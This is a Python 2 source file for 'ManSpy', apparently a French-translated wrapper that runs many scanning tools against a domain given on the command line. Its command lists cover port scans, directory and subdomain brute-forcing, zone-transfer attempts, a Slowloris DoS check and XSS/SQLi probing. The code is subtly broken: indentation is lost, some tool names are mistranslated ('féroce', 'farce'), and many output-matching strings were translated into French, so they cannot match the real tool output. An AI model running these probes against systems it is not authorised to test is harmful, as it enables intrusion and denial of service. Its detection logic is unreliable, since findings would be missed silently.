for name, count in intervals:
value = seconds // count
if value:
seconds -= value * count
result.append("{}{}".format(value, name))
return ' '.join(result[:granularity])
def url_maker(url):
if not re.match(r'http(s?)\:', url):
url = 'http://' + url
parsed = urlsplit(url)
host = parsed.netloc
if host.startswith('www.'):
host = host[4:]
return host
def verifier_internet():
os.system('ping -c1 google.com > ms_net 2>&1')
if "0% packet loss" in open('ms_net').read():
val = 1
else:
val = 0
os.system('rm ms_net > /dev/null 2>&1')
return val
# la classe de module de couleur
class bcolors:
HEADER = '\033[95m'
TBLUE = '\033[94m'
TGREEN = '\033[92m'
TLRED = '\033[91m'
WARNING = '\033[93m'
BADFAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
BG_YLL = "\033[103m"
BG_LB = "\033[105m"
BG_Cyan = '\033[46m'
BG_ERR_TXT = '\033[41m' #Pour les erreurs critiques et les plantages
BG_HEAD_TXT = '\033[100m'
BG_ENDL_TXT = '\033[46m'
BG_CRIT_TXT = '\033[45m'
BG_HIGH_TXT = '\033[41m'
BG_MED_TXT = '\033[43m'
BG_LOW_TXT = '\033[44m'
BG_INFO_TXT = '\033[42m'
# Classifie la gravité de la vulnérabilité
def vul_info(val):
resultat = ''
if val == 'c':
resultat = bcolors.BG_CRIT_TXT + " critique " + bcolors.ENDC
elif val == 'e':
resultat = bcolors.BG_HIGH_TXT + " élevé " + bcolors.ENDC
elif val == 'm':
resultat = bcolors.BG_MED_TXT + " moyen " + bcolors.ENDC
elif val == 'f':
resultat = bcolors.BG_LOW_TXT + " faible " + bcolors.ENDC
else:
resultat = bcolors.BG_INFO_TXT + " info " + bcolors.ENDC
return resultat
# Les index
proc_haut = bcolors.BADFAIL + "●" + bcolors.ENDC
proc_med = bcolors.WARNING + "●" + bcolors.ENDC
proc_fible = bcolors.TGREEN + "●" + bcolors.ENDC
# Lie la vulnérabilité au niveau de menace...
def vul_as_info(v1, v2, v3):
print (bcolors.BOLD + "Niveau de menace de vulnérabilité" + bcolors.ENDC)
print ("\t" + vul_info(v2) + " " + bcolors.WARNING + str(rep_outil[v1][0]) + bcolors.ENDC)
print (bcolors.BOLD + "Définition de la vulnérabilité" + bcolors.ENDC)
print ("\t" + bcolors.BADFAIL + str(outils_correctifs[v3 - 1][1]) + bcolors.ENDC)
print (bcolors.BOLD + "Assainissement de la vulnérabilité" + bcolors.ENDC)
print ("\t" + bcolors.TGREEN + str(outils_correctifs[v3 - 1][2]) + bcolors.ENDC)
# ManSpy Help
def helper():
print (bcolors.TBLUE + "Les informations:" + bcolors.ENDC)
print ("------------")
print ("\t./manSpy.py exemple.com: analyse le domaine 'exemple.com'")
print ("\t./manSpy.py --help : Affiche ce contexte d'aide.")
print (bcolors.TBLUE + "Interactives:" + bcolors.ENDC)
print ("------------")
print (bcolors.TLRED +"\tCtrl+C:"+bcolors.ENDC+" Ignore le test en cours.")
print (bcolors.TLRED +"\tCtrl+Z:"+bcolors.ENDC+" Quitte ManSpy.")
print (bcolors.TBLUE + "Les index:" + bcolors.ENDC)
print ("--------")
print ("\t[" + proc_haut + "]: Le processus de numérisation peut prendre plus de temps (non prévisible).")
print ("\t[" + proc_med + "]: Le processus de numérisation peut prendre moins de 10 minutes.")
print ("\t[" + proc_fible + "]: Le processus de numérisation peut prendre moins d’une minute ou deux.")
print (bcolors.BG_Cyan + "Les informations de vulnérabilité" + bcolors.ENDC)
print ("--------------------------")
print ("\t" + vul_info(
'c') + ": A besion une attention immédiate car cela peut entraîner des compromissions ou une indisponibilité du service.")
print ("\t" + vul_info(
'e') + " : Peut ne pas conduire à un compromis immédiat, mais les chances de probabilité sont grandes.")
print ("\t" + vul_info(
'm') + " : L'attaquant peut mettre en corrélation plusieurs vulnérabilités de ce type pour lancer une attaque sophistiquée.")
print ("\t" + vul_info('f') + " : Pas un problème grave, mais il est recommandé d'assister à la conclusion.")
print ("\t" + vul_info(
'i') + " : Ne pas classé comme une vulnérabilité,tout simplement une alerte informationnelle utile à prendre en compte.\n")
# Effacment
def clear():
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
# ManSpy Logo
def logo():
print (bcolors.WARNING)
print("""\
_____ ______ ________ ________ ________ ________ ___ ___
|\ _ \ _ \|\ __ \|\ ___ \|\ ____\|\ __ \|\ \ / /|
\ \ \\\__\ \ \ \ \|\ \ \ \\ \ \ \ \___|\ \ \|\ \ \ \/ / /
\ \ \\|__| \ \ \ __ \ \ \\ \ \ \_____ \ \ ____\ \ / /
\ \ \ \ \ \ \ \ \ \ \ \\ \ \|____|\ \ \ \___|\/ / /
\ \__\ \ \__\ \__\ \__\ \__\\ \__\____\_\ \ \__\ __/ / /
\|__| \|__|\|__|\|__|\|__| \|__|\_________\|__||\___/ /
\|_________| \|___|/
""" + bcolors.TLRED + """(Mansour Eddih - Maryem Abouhafes - Hanane Rajji '4isi')
""")
print (bcolors.ENDC)
class Spinner:
occupe = False
retard = 0.05
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/\\': yield cursor #←↑↓→
#for cursor in '←↑↓→': yield cursor !! prob affichage !!!
def __init__(self, retard=None):
self.spinner_generator = self.spinning_cursor()
if retard and float(retard): self.retard = retard
def spinner_task(self):
try:
while self.occupe:
#sys.stdout.write(next(self.spinner_generator))
print bcolors.BG_ERR_TXT+next(self.spinner_generator)+bcolors.ENDC,
sys.stdout.flush()
time.sleep(self.retard)
sys.stdout.write('\b')
sys.stdout.flush()
except (KeyboardInterrupt, SystemExit):
#clear()
print "\n\t"+ bcolors.BG_ERR_TXT+"ManSpy à reçu une série des clicks sur Ctrl + C. Quitter..." +bcolors.ENDC
sys.exit(1)
def start(self):
self.occupe = True
threading.Thread(target=self.spinner_task).start()
def stop(self):
try:
self.occupe = False
time.sleep(self.retard)
except (KeyboardInterrupt, SystemExit):
#clear()
print "\n\t"+ bcolors.BG_ERR_TXT+"ManSpy à reçu une série des clicks sur Ctrl + C. Quitter..." +bcolors.ENDC
sys.exit(1)
spinner = Spinner()
noms_outils = [
["host", "host - Vérifie l'existence d'une adresse IPV6.", "host", 1],
["aspnet_config_err", "ASP.Net Misconfiguration - Vérifie si ASP.Net Misconfiguration.", "wget", 1],
["wp_check", "WordPress Checker - Vérifie l'installation de WordPress.", "wget", 1],
["drp_check", "Drupal Checker - Vérifie l’installation de Drupal.", "wget", 1],
["joom_check", "Joomla Checker - Vérifie l’installation de Joomla.", "wget", 1],
["uniscan", "Uniscan - Vérifie les fichiers robots.txt et sitemap.xml", "uniscan", 1],
["wafw00f", "Wafw00f - Vérifications des pare-feu applicatifs.", "wafw00f", 1],
["nmap", "Nmap - Analyse rapide [seulement quelques vérifications de ports] "," nmap ", 1],
["theharvester", "The Harvester - Analyse les emails en utilisant la recherche passive de Google.", "theharvester", 1],
["dnsrecon", "DNSRecon - tente plusieurs transferts de zone sur des serveurs de noms.", "dnsrecon", 1],
["féroce", "Féroce - Tentatives de transfert de zone [Pas de force brutale]", "féroce", 1],
["dnswalk", "DNSWalk - Tentative de transfert de zone.", "dnswalk", 1],
["whois", "WHOis - Vérifications des informations de contact de l'administrateur.", "whois", 1],
["nmap_header", "Nmap [Vérification du filtre XSS] - Vérifie si l'en-tête de protection XSS est présent.", "nmap", 1],
["nmap_sloris", "Nmap [Slowloris DoS] - Vérifications de la vulnérabilité de déni de service de Slowloris.", "nmap", 1],
["sslyze_hbleed", "SSLyze - Vérifie uniquement la vulnérabilité Heartbleed.", "sslyze", 1],
["nmap_hbleed", "Nmap [Heartbleed] - Vérifie uniquement la vulnérabilité de Heartbleed.", "nmap", 1],
["nmap_poodle", "Nmap [POODLE] - Vérifie uniquement la vulnérabilité du caniche.", "nmap", 1],
["nmap_ccs", "Nmap [Injection OpenSSL CCS] - Vérifie uniquement l'injection CCS.", "nmap", 1],
["nmap_freak", "Nmap [FREAK] - Vérifie uniquement la vulnérabilité de FREAK.", "nmap", 1],
["nmap_logjam", "Nmap [LOGJAM] - Vérifications de la vulnérabilité de LOGJAM.", "nmap", 1],
["sslyze_ocsp", "SSLyze - Vérifie l'agrafage OCSP.", "sslyze", 1],
["sslyze_zlib", "SSLyze - Vérifications de la compression ZLib Deflate.", "sslyze", 1],
["sslyze_reneg", "SSLyze - Vérifie la prise en charge de la renégociation sécurisée et la renégociation du client.", "sslyze", 1],
["sslyze_resum", "SSLyze - Vérifie la prise en charge de la reprise de session avec [ID de session / tickets TLS].", "sslyze", 1],
["lbd", "LBD - Vérifications des équilibreurs de charge DNS / HTTP.", "lbd", 1],
["golismero_dns_malware", "Golismero - Vérifie si le domaine est spoofé ou détourné.", "golismero", 1],
["golismero_heartbleed", "Golismero - Recherche uniquement la vulnérabilité Heartbleed.", "golismero", 1],
["golismero_brute_url_predictables", "Golismero - BruteForces pour certains fichiers du domaine.", "golismero", 1],
["golismero_brute_directories", "Golismero - BruteForces pour certains répertoires du domaine.", "golismero", 1],
["golismero_sqlmap", "Golismero - SQLMap [ne récupère que la bannière DB]", "golismero", 1],
["dirb", "DirB - Brute la cible pour les répertoires ouverts.", "dirb", 1],
["xsser", "XSSer - Vérifications d'attaques de script intersite [XSS].", "xsser", 1],
["golismero_ssl_scan", "Analyses SSL Golismero - Effectue des analyses liées à SSL.", "golismero", 1],
["golismero_zone_transfer", "Transfert de zone Golismero - Tentative de transfert de zone.", "golismero", 1],
["golismero_nikto", "Golismero Nikto Scans - Utilise Nikto Plugin pour détecter les vulnérabilités.", "golismero", 1],
["golismero_brute_subdomains", "Sous-domaines de Golismero Bruter - Découverte de sous-domaines de forces brutes.", "golismero", 1],
["dnsenum_zone_transfer", "DNSEnum - Tentative de transfert de zone.", "dnsenum", 1],
["fierce_brute_subdomains", "Fierce Subdomains Bruter - Découverte du sous-domaine des forces brutes.", "farce", 1],
["dmitry_email", "DMitry - Récolte de manière passive les emails du domaine.", "dmitry", 1],
["dmitry_subdomains", "DMitry - Récolte de manière passive des sous-domaines du domaine.", "dmitry", 1],
["nmap_telnet", "Nmap [TELNET] - Vérifie si le service TELNET est en cours d'exécution.", "nmap", 1],
["nmap_ftp", "Nmap [FTP] - Vérifie si le service FTP est en cours d'exécution.", "nmap", 1],
["nmap_stuxnet", "Nmap [STUXNET] - Vérifie si l'host est affecté par le ver STUXNET.", "nmap", 1],
["webdav", "WebDAV - Vérifie si WEBDAV est activé sur le répertoire personnel.", "davtest", 1],
["golismero_finger", "Golismero - Fait une empreinte digitale sur le domaine.", "golismero", 1],
["uniscan_filebrute", "Uniscan - Brutes pour les noms de fichiers sur le domaine.", "uniscan", 1],
["uniscan_dirbrute", "Uniscan - Annuaires Brutes sur le domaine", "uniscan", 1],
["uniscan_ministresser", "Uniscan - Tester le domaine.", "uniscan", 1],
["uniscan_rfi", "Uniscan - Vérifications LFI, RFI et RCE.", "uniscan", 1],
["uniscan_xss", "Uniscan - Vérifications XSS, SQLi, BSQLi et autres vérifications.", "uniscan", 1],
["nikto_xss", "Nikto - Vérifie l'en-tête XSS d'Apache Expect.", "nikto", 1],
["nikto_subrute", "Nikto - Brutes Subdomains.", "nikto", 1],
["nikto_shellshock", "Nikto - Vérifications du bogue Shellshock.", "nikto", 1],
["nikto_internalip", "Nikto - Recherche des fuites internes IP", "nikto", 1],
["nikto_putdel", "Nikto - Vérifie si HTTP PUT DEL.", "nikto", 1],
["nikto_headers", "Nikto - Vérifie les en-têtes de domaine.", "nikto", 1],
["nikto_ms01070", "Nikto - Vérifications de la vulnérabilité MS10-070.", "nikto", 1],
["nikto_servermsgs", "Nikto - Vérifications des problèmes de serveur.", "nikto", 1],
["nikto_outdated", "Nikto - Vérifie si le serveur est obsolète.", "nikto", 1],
["nikto_httpoptions", "Nikto - Vérifie les options HTTP sur le domaine.", "nikto", 1],
["nikto_cgi", "Nikto - Énumère les répertoires CGI.", "nikto", 1],
["nikto_ssl", "Nikto - Effectue des vérifications SSL.", "nikto", 1],
["nikto_sitefiles", "Nikto - Vérifie la présence de fichiers intéressants sur le domaine.", "nikto", 1],
["nikto_paths", "Nikto - Vérifie les chemins injectables.", "nikto", 1],
["dnsmap_brute", "DNSMap - Brutes Subdomains.", "dnsmap", 1],
["nmap_sqlserver", "Nmap - Vérifications de la base de données MS-SQL Server", "nmap", 1],
["nmap_mysql", "Nmap - Vérifie la base de données MySQL", "nmap", 1],
["nmap_oracle", "Nmap - Vérifications de la base de données ORACLE", "nmap", 1],
["nmap_rdp_udp", "Nmap - Vérifie le service Bureau à distance via UDP", "nmap", 1],
["nmap_rdp_tcp", "Nmap - Vérifie le service Bureau à distance via TCP", "nmap", 1],
["nmap_full_ps_tcp", "Nmap - Effectue une analyse complète du port TCP", "nmap", 1],
["nmap_full_ps_udp", "Nmap - Effectue une analyse complète du port UDP", "nmap", 1],
["nmap_snmp", "Nmap - Vérifications du service SNMP", "nmap", 1],
["aspnet_elmah_axd", "Vérifications pour ASP.net Elmah Logger", "wget", 1],
["nmap_tcp_smb", "Vérifie le service SMB sur TCP", "nmap", 1],
["nmap_udp_smb", "Vérifications du service SMB sur UDP", "nmap", 1],
["wapiti", "Wapiti - Vérifications de SQLi, RCE, XSS et autres vulnérabilités", "wapiti", 1],
["nmap_iis", "Nmap - Vérifications de IIS WebDAV", "nmap", 1],
["whatweb", "WhatWeb - Vérifie l'en-tête de protection X-XSS", "whatweb", 1]
]
cmd_outils = [
["host ",""],
["wget -O temp_aspnet_config_err --tries=1 ","/%7C~.aspx"],
["wget -O temp_wp_check --tries=1 ","/wp-admin"],
["wget -O temp_drp_check --tries=1 ","/user"],
["wget -O temp_joom_check --tries=1 ","/administrator"],
["uniscan -e -u ",""],
["wafw00f ",""],
["nmap -F --open -Pn ",""],
["theharvester -l 50 -b google -d ",""],
["dnsrecon -d ",""],
["fierce -wordlist xxx -dns ",""],
["dnswalk -d ","."],
["whois ",""],
["nmap -p80 --script http-security-headers -Pn ",""],
["nmap -p80,443 --script http-slowloris --max-parallelism 500 -Pn ",""],
["sslyze --heartbleed ",""],
["nmap -p443 --script ssl-heartbleed -Pn ",""],
["nmap -p443 --script ssl-poodle -Pn ",""],
["nmap -p443 --script ssl-ccs-injection -Pn ",""],
["nmap -p443 --script ssl-enum-ciphers -Pn ",""],
["nmap -p443 --script ssl-dh-params -Pn ",""],
["sslyze --certinfo=basic ",""],
["sslyze --compression ",""],
["sslyze --reneg ",""],
["sslyze --resum ",""],
["lbd ",""],
["golismero -e dns_malware scan ",""],
["golismero -e heartbleed scan ",""],
["golismero -e brute_url_predictables scan ",""],
["golismero -e brute_directories scan ",""],
["golismero -e sqlmap scan ",""],
["dirb http://"," -fi"],
["xsser --all=http://",""],
["golismero -e sslscan scan ",""],
["golismero -e zone_transfer scan ",""],
["golismero -e nikto scan ",""],
["golismero -e brute_dns scan ",""],
["dnsenum ",""],
["fierce -dns ",""],
["dmitry -e ",""],
["dmitry -s ",""],
["nmap -p23 --open -Pn ",""],
["nmap -p21 --open -Pn ",""],
["nmap --script stuxnet-detect -p445 -Pn ",""],
["davtest -url http://",""],
["golismero -e fingerprint_web scan ",""],
["uniscan -w -u ",""],
["uniscan -q -u ",""],
["uniscan -r -u ",""],
["uniscan -s -u ",""],
["uniscan -d -u ",""],
["nikto -Plugins 'apache_expect_xss' -host ",""],
["nikto -Plugins 'subdomain' -host ",""],
["nikto -Plugins 'shellshock' -host ",""],
["nikto -Plugins 'cookies' -host ",""],
["nikto -Plugins 'put_del_test' -host ",""],
["nikto -Plugins 'headers' -host ",""],
["nikto -Plugins 'ms10-070' -host ",""],
["nikto -Plugins 'msgs' -host ",""],
["nikto -Plugins 'outdated' -host ",""],
["nikto -Plugins 'httpoptions' -host ",""],
["nikto -Plugins 'cgi' -host ",""],
["nikto -Plugins 'ssl' -host ",""],
["nikto -Plugins 'sitefiles' -host ",""],
["nikto -Plugins 'paths' -host ",""],
["dnsmap ",""],
["nmap -p1433 --open -Pn ",""],
["nmap -p3306 --open -Pn ",""],
["nmap -p1521 --open -Pn ",""],
["nmap -p3389 --open -sU -Pn ",""],
["nmap -p3389 --open -sT -Pn ",""],
["nmap -p1-65535 --open -Pn ",""],
["nmap -p1-65535 -sU --open -Pn ",""],
["nmap -p161 -sU --open -Pn ",""],
["wget -O temp_aspnet_elmah_axd --tries=1 ","/elmah.axd"],
["nmap -p445,137-139 --open -Pn ",""],
["nmap -p137,138 --open -Pn ",""],
["wapiti "," -f txt -o temp_wapiti"],
["nmap -p80 --script=http-iis-webdav-vuln -Pn ",""],
["whatweb "," -a 1"]
]
rep_outil = [
["N'a pas d'adresse IPv6. C'est bien d'en avoir un.","i",1],
["ASP.Net est mal configuré pour afficher les erreurs de pile de serveurs à l'écran.","m",2],
["WordPress Installation trouvée. Rechercher les vulnérabilités correspond à cette version.","i",3],
["Drupal Installation trouvée. Rechercher les vulnérabilités correspond à cette version.","i",4],
["Joomla Installation trouvée. Rechercher les vulnérabilités correspond à cette version.","i",5],
["robots.txt/sitemap.xml a trouvé. Vérifiez ces fichiers pour toute information.","i",6],
["Aucun pare-feu d'application Web à été détecté","m",7],
["Certains ports sont ouverts. Effectuer une analyse complète manuellement.","f",8],
["Adresses email trouvées.","f",9],
["Transfert de zone réussi avec DNSRecon. Reconfigurer le DNS immédiatement","e",10],
["Transfert de zone réussi avec fierce. Reconfigurer le DNS immédiatement.","e",10],
["Transfert de zone réussi avec dnswalk. Reconfigurer le DNS immédiatement.","e",10],
["Informations Whois disponibles publiquement.","i",11],
["Le filtre de protection XSS est désactivé.","m",12],
["Vulnérable au déni de service de Slowloris.","c",13],
["Vulnérabilité HEARTBLEED trouvée avec SSLyze.","e",14],
["Vulnérabilité HEARTBLEED trouvée avec Nmap.","e",14],
["Vulnérabilité POODLE détectée.","e",15],
["OpenSSL CCS Injection détectée","e",16],
["Vulnérabilité FREAK détectée","e",17],
["Vulnérabilité de LOGJAM détectée.","e",18],
["Réponse OCSP infructueuse.","m",19],
["Le serveur prend en charge la compression Deflate.","m",20],
["La renégociation sécurisée n'est pas prise en charge.","m",21],
["Reprise sécurisée non prise en charge avec (ID de session / Billets TLS).","m",22],
["Aucun équilibreur de charge basé sur DNS / HTTP trouvé.","f",23],
["le domaine est spoofed/hijacked.","e",24],
["Vulnérabilité HEARTBLEED trouvée avec Golismero.","e",14],
["OOpen Files Found avec Golismero BruteForce.","m",25],
["Open Directories Found avec Golismero BruteForce.","m",26],
["DB Banner récupéré avec SQLMap.","f",27],
["épertoires ouverts trouvés avec DirB.","m",26],
["XSSer a trouvé des vulnérabilités XSS.","c",28],
["Trouvé des vulnérabilités SSL liées à Golismero.","m",29],
["Transfert de zone réussi avec Golismero. Reconfigurer DNS immédiatement.","e",10],
["Golismero Nikto Plugin a découvert des vulnérabilités.","m",30],
["FSous-domaines trouvés avec Golismero.","m",31],
["Transfert de zone réussi avec DNSEnum. Reconfigurer DNS immédiatement.","e",10],
["Sous-domaines trouvés avec Fierce.","m",31],
["Adresses email découvertes avec DMitry.","f",9],
["Sous-domaines découverts avec DMitry.","m",31],
["Telnet Service Detected.","e",32],
["Vulnérable à STUXNET.", "c", 34],
["WebDAV activé.", "m", 35],
["Trouvé des informations à travers Fingerprinting.", "f", 36],
["Ouvrir les fichiers trouvés avec Uniscan.", "m", 25],
["Open Directories Found with Uniscan.", "m", 26],
["Vulnérable aux stress tests.", "e", 37],
["Uniscan a détecté un possible LFI, RFI ou RCE.", "e", 38],
["Uniscan a détecté une éventuelle XSS, SQLi, BSQLi.", "e", 39],
["En-tête XSS non présent dans Apache Expect.", "m", 12],
["Sous-domaines trouvés avec Nikto.", "m", 31],
["Serveur Web vulnérable au bogue Shellshock.", "c", 40],
["Le serveur Web présente une adresse IP interne.", "f", 41],
["Méthodes HTTP PUT DEL activées.", "m", 42],
["Quelques en-têtes vulnérables exposés.", "m", 43],
["Serveur Web vulnérable à MS10-070.", "e", 44],
["Quelques problèmes trouvés sur le serveur Web.", "m", 30],
["Le serveur Web est obsolète.", "e", 45],
["Quelques problèmes rencontrés avec les options HTTP.", "f", 42],
["CGI Directories Enumerated.", "f", 26],
["Vulnérabilités identifiées dans les scans SSL.", "m", 29],
["Fichiers intéressants détectés.", "m", 25],
["Chemins injectables détectés.", "f", 46],
["Sous-domaines trouvés avec DNSMap.", "m", 31],
["Service de base de données MS-SQL détecté.", "f", 47],
["Service de base de données MySQL détecté.", "f", 47],
["Service ORACLE DB détecté.", "f", 47],
["Serveur RDP détecté sur UDP.", "e", 48],
["Serveur RDP détecté sur TCP.", "e", 48],
["Les ports TCP sont ouverts", "f", 8],
["Les ports UDP sont ouverts", "f", 8],
["Service SNMP détecté.", "m", 49],
["Elmah est configuré.", "m", 50],
["Les ports SMB sont ouverts sur TCP", "m", 51],
["Les ports SMB sont ouverts sur UDP", "m", 51],
["Wapiti a découvert une série de vulnérabilités", "e", 30],
["IIS WebDAV est activé", "m", 35],
["La protection X-XSS n'est pas présente", "m", 12]
]
outils_status = [
["a IPv6", 1, proc_fible, "<15s", "ipv6", ["introuvable", "a IPv6"]],
["Erreur de serveur", 0, proc_fible, "<30s", "asp.netmisconf", ["incapable de résoudre l'adresse de l'host", "Connexion expirée"]],
["wp-login", 0, proc_fible, "<30s", "wpcheck", ["impossible de résoudre l'adresse de l'host", "connexion expirée"]],
["drupal", 0, proc_fible, "<30s", "drupalcheck", ["incapable de résoudre l'adresse de l'host", "La connexion a expiré"]],
["joomla", 0, proc_fible, "<30s", "joomlacheck", ["incapable de résoudre l'adresse de l'host", "La connexion a expiré"]],
["[+]", 0, proc_fible, "<40s", "robotscheck", ["Utilisation de la valeur non initialisée dans unpack à"]],
["No WAF", 0, proc_fible, "<45s", "wafcheck", ["semble être en panne"]],
["tcp open", 0, proc_med, "<2m", "nmapopen", ["Impossible de résoudre"]],
["Aucun email trouvé", 1, proc_med, "<3m", "moissonneuse", ["Aucun host trouvé", "Aucun email trouvé"]],
["[+] Le transfert de zone a réussi !!", 0, proc_fible, "<20s", "dnsreconzt", ["Impossible de résoudre le domaine"]],
["Whoah, ça a marché", 0, proc_fible, "<30s", "fiercezt", ["none"]],
["0 erreurs", 0, proc_fible, "<35s", "dnswalkzt", ["!!! 0 échecs, 0 avertissements, 3 erreurs."]],
["Email Email:", 0, proc_fible, "<25s", "whois", ["Aucune correspondance pour le domaine"]],
["Le filtre XSS est désactivé", 0, proc_fible, "<20s", "nmapxssh", ["Échec de la résolution"]],
["VULNERABLE", 0, proc_haut, "<45m", "nmapdos", ["Échec de la résolution"]],
["Le serveur est vulnérable à Heartbleed", 0, proc_fible, "<40s", "sslyzehb", ["Impossible de résoudre le nom d'host"]],
["VULNERABLE", 0, proc_fible, "<30s", "nmap1", ["Impossible de résoudre"]],
["VULNERABLE", 0, proc_fible, "<35s", "nmap2", ["Impossible de résoudre"]],
["VULNERABLE", 0, proc_fible, "<35s", "nmap3", ["Impossible de résoudre"]],
["VULNERABLE", 0, proc_fible, "<30s", "nmap4", ["Impossible de résoudre"]],
["VULNERABLE", 0, proc_fible, "<35s", "nmap5", ["Impossible de résoudre"]],
["ERREUR - l'état de la réponse OCSP n'aboutit pas", 0, proc_fible,"<25s", "sslyze1", ["Impossible de résoudre le nom d'host"]],
["VULNERABLE", 0, proc_fible, "<30s", "sslyze2", ["Impossible de résoudre le nom d'host"]],
["VULNERABLE", 0, proc_fible, "<25s", "sslyze3", ["Impossible de résoudre le nom d'host"]],
["VULNERABLE", 0, proc_fible, "<30s", "sslyze4", ["Impossible de résoudre le nom d'host"]],
["N'utilise PAS l'équilibrage de charge", 0, proc_med, "<4m", "lbd", ["NON TROUVE"]],
["Aucune vulnérabilité trouvée", 1, proc_fible, "<45s", "golism1", ["Impossible de résoudre le nom de domaine", "Aucune vulnérabilité trouvée"]],
["Aucune vulnérabilité trouvée", 1, proc_fible, "<40s", "golism2", ["Impossible de résoudre le nom de domaine", "Aucune vulnérabilité trouvée"]],
["Aucune vulnérabilité trouvée", 1, proc_fible, "<45s", "golism3", ["Impossible de résoudre le nom de domaine", "Aucune vulnérabilité trouvée"]],
["Aucune vulnérabilité trouvée", 1, proc_fible, "<40s", "golism4", ["Impossible de résoudre le nom de domaine", "Aucune vulnérabilité trouvée"]],
["Aucune vulnérabilité trouvée", 1, proc_fible, "<45s", "golism5", ["Impossible de résoudre le nom de domaine", "Aucune vulnérabilité trouvée"]],
["TROUVE: 0", 1, proc_haut, "<35m", "dirb", ["PEU NE RÉSOLVE host", "TROUVE: 0"]],
["Impossible de trouver une vulnérabilité!", 1, proc_med, "<4m", "xsser", ["XSSer ne fonctionne pas correctement!", "Impossible de trouver une vulnérabilité!"]],
["ID d’occurrence", 0, proc_fible, "<45s", "golism6", ["Impossible de résoudre le nom de domaine"]],
["Transfert de zone DNS réussi", 0, proc_fible, "<30s", "golism7", ["Impossible de résoudre le nom de domaine"]],
["Nikto a trouvé 0 vulnérabilités", 1, proc_med, "<4m", "golism8", ["Impossible de résoudre le nom de domaine", "Nikto a trouvé 0 vulnérabilités"]],
["Fuite possible du sous-domaine", 0, proc_haut, "<30m", "golism9", ["Impossible de résoudre le nom de domaine"]],
["Echec de la requête d'enregistrement AXFR:", 1, proc_fible, "<45s", "dnsenumzt", ["La requête d'enregistrement NS a échoué:", "Echec de la requête d'enregistrement AXFR", "aucun enregistrement NS pour"]],
["0 entrées trouvées", 1, proc_haut, "<75m", "fierce2", ["trouvé 0 entrées", "is gimp"]],
["0 message (s) trouvé (s)", 1, proc_fible, "<30s", "dmitry1", ["Impossible de localiser l'adresse IP de l'host", "0 message (s) trouvé (s)"]],
["Trouvé 0 sous-domaine (s) possible (s)", 1, proc_fible, "<35s", "dmitry2", ["Impossible de localiser l'adresse IP de l'host", "Trouvé 0 sous-domaine (s) possible"]],
["open", 0, proc_fible, "<15s", "nmaptelnet", ["Impossible de résoudre"]],
["open", 0, proc_fible, "<15s", "nmapftp", ["Impossible de résoudre le problème"]],
["open", 0, proc_fible, "<20s", "nmapstux", ["Impossible de résoudre le problème"]],
["SUCCEED", 0, proc_fible, "<30s", "webdav", ["n'est pas activé par DAV ou n'est pas accessible."]],
["Aucune vulnérabilité trouvée", 1, proc_fible, "<15s", "golism10", ["Impossible de résoudre le nom de domaine", "Aucune vulnérabilité trouvée"]],
["[+]", 0, proc_med, "<2m", "uniscan2", ["Utilisation de la valeur non initialisée dans unpack à"]],
["[+]", 0, proc_med, "<5m", "uniscan3", ["Utilisation de la valeur non initialisée dans unpack à"]],
["[+]", 0, proc_med, "<9m", "uniscan4", ["Utilisation de la valeur non initialisée dans unpack à"]],
["[+]", 0, proc_med, "<8m", "uniscan5", ["Utilisation de la valeur non initialisée dans unpack à"]],
["[+]", 0, proc_med, "<9m", "uniscan6", ["Utilisation de la valeur non initialisée dans unpack à"]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto1", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto2", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto3", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto4", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto5", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto6", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto7", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto8", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto9", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto10", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto11", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto12", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto13", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 élément (s) signalé (s)", 1, proc_fible, "<35s", "nikto14", "ERREUR: Impossible de résoudre le nom d'host, 0 élément (s) signalé (s)"],
["# 1", 0, proc_haut, "<30m", "dnsmap_brute", ["[+] 0 (sous) domaines et 0 adresses IP trouvées"]],
["open", 0, proc_fible, "<15s", "nmapmssql", ["Impossible de résoudre le problème"]],
